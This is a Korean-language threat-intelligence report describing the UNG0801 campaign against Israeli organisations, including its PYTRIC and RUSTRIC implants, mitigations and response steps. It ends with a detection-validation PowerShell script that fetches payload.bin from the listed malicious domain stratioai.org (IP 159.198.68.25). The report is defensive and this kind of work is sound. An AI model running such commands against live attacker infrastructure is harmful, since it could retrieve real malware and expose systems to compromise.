SOC Prime Bias: 심각

30 Dec 2025 13:40 UTC

UNG0801: AV 아이콘 스푸핑을 통한 이스라엘 표적 위협 활동

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon 팔로우
UNG0801: AV 아이콘 스푸핑을 통한 이스라엘 표적 위협 활동
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

이 보고서는 악성 PDF 및 Word 문서를 무기화하여 안티바이러스 아이콘을 스푸핑하고 이스라엘 조직을 목표로 하는 두 가지 연결된 캠페인을 설명합니다. 한 트랙은 PyInstaller로 패키징된 Python 임플란트인 PYTRIC을 제공하고, 다른 트랙은 매크로가 활성화된 Word 문서를 통해 실행되는 Rust 기반 임플란트인 RUSTRIC을 제공합니다. 두 페이로드 모두 호스트 정보를 수집하고 시스템 명령을 실행하며 설치된 보안 소프트웨어를 탐색합니다. PYTRIC은 추가로 파괴적인 기능을 포함하고 있습니다. 전달은 스피어피싱 첨부 파일과 클라우드 호스팅 링크(드롭박스 포함)로 진행되며, 명령 및 제어에는 텔레그램이 사용됩니다.

조사

SEQRITE Labs는 초기 피싱 유인물을 분석하고, 포함된 매크로를 추출하며, 드롭된 페이로드 체인을 재구성했습니다. PYTRIC은 파일 검색과 삭제 루틴을 가지고 있는 PyInstaller 번들로 확인되었고, 애널리스트는 Backup2040과 연관된 텔레그램 봇 자격 증명을 관찰했습니다. RUSTRIC은 28개의 안티바이러스 제품을 확인하고 WMI를 사용하여 16진수 인코딩된 페이로드를 트리거하는 Rust 바이너리로 프로파일링되었습니다. 인프라 분석은 드롭박스 링크와 이전에 연결된 IP 주소로 해결된 도메인에 대한 배달을 연결했습니다. netvigil.org.

완화

사용자에게 보안 도구 또는 AV 관련 유틸리티로 제시된 PDF 및 Word 첨부 파일을 주의 깊에 취급하도록 교육하십시오. 매크로가 포함된 문서를 차단하고 페이로드 전송에 사용되는 클라우드 스토리지 호스트로 연결하는 URL을 플래그하거나 제한하도록 이메일 보안을 구성하십시오. 엔드포인트에서는 PyInstaller 실행, 비정상적인 WMI 프로세스 생성, whoami, hostname, nslookup과 같은 기본 제공 유틸리티의 의심스러운 호출을 모니터링합니다. 확인된 악성 도메인 및 IP의 차단은 감염 경로를 더욱 방해할 수 있습니다.

대응

활동이 감지되면 영향을 받은 시스템을 격리하고 휘발성 데이터를 보존하며, 해시 기반 분류를 위해 악성 문서를 수집합니다. 의심스러운 WMI로 생성된 프로세스를 중지하고, 다운로드 폴더와 같은 공통 스테이징 위치에서 드롭된 페이로드를 제거합니다. 파일 삭제나 삭제 활동에 대한 포렌식 검증을 수행하고, 노출 가능성이 있는 자격 증명을 재설정하며, 후속 텔레그램 C2 통신을 모니터링합니다.

공격 흐름

시뮬레이션 실행

사전 조건: Telemetry & Baseline Pre-flight Check가 통과해야 합니다.

이유: 이 섹션은 탐지 규칙을 트리거하기 위해 설계된 적대적 기술(TTP)의 정확한 실행을 자세히 설명합니다. 명령 및 설명은 식별된 TTP를 직접 반영해야 하며 탐지 논리에 의해 예상되는 정확한 원격 정보를 생성하는 것을 목표로 합니다. 추상적 또는 관련없는 예제는 오진을 초래할 것입니다.

  • 공격 내러티브 및 명령:
    공격자는 도메인을 사전에 등록하였습니다 stratioai.org 그리고 이를 159.198.68.25 (손상된 VPS)로 해결할 수 있도록 구성했습니다. PowerShell 원라이너를 사용하여 소규모 페이로드를 다운로드한 후 지속적인 역셸을 유지하는 C2 비콘을 시작합니다. 아웃바운드 연결은 HTTPS(포트 443)를 통해 일반 트래픽으로 혼합되지만 방화벽은 목적지 IP와 DNS 쿼리를 기록하여 시그마 규칙을 만족시킵니다.

  • 회귀 테스트 스크립트:

    # -------------------------------------------------
    # 탐지 유효성 검사를 위한 시뮬레이션된 C2 비콘
    # -------------------------------------------------
    # 1. 악성 도메인 해결(DNS 쿼리 강제)
    $maliciousDomain = "stratioai.org"
    $resolved = [System.Net.Dns]::GetHostAddresses($maliciousDomain)
    Write-Host "Resolved $maliciousDomain to $($resolved -join ', ')"
    
    # 2. 악성 IP( C2)로 HTTPS 연결 설정
    $maliciousIP = "159.198.68.25"
    $url = "https://$maliciousDomain/payload.bin"
    
    try {
        $response = Invoke-WebRequest -Uri $url -UseBasicParsing -TimeoutSec 10
        Write-Host "C2 request succeeded, size: $($response.ContentLength) bytes"
    } catch {
        Write-Error "C2 request failed: $_"
    }
    
    # 3. 선택 사항: 채널을 30초 동안 활성 유지
    Start-Sleep -Seconds 30
    # -------------------------------------------------
  • 정리 명령:

    # 임시 파일 제거(이 스크립트에서는 생성되지 않음)
    # DNS 캐시 삭제하여 실수로 재사용 방지
    ipconfig /flushdns
    Write-Host "정리 완료."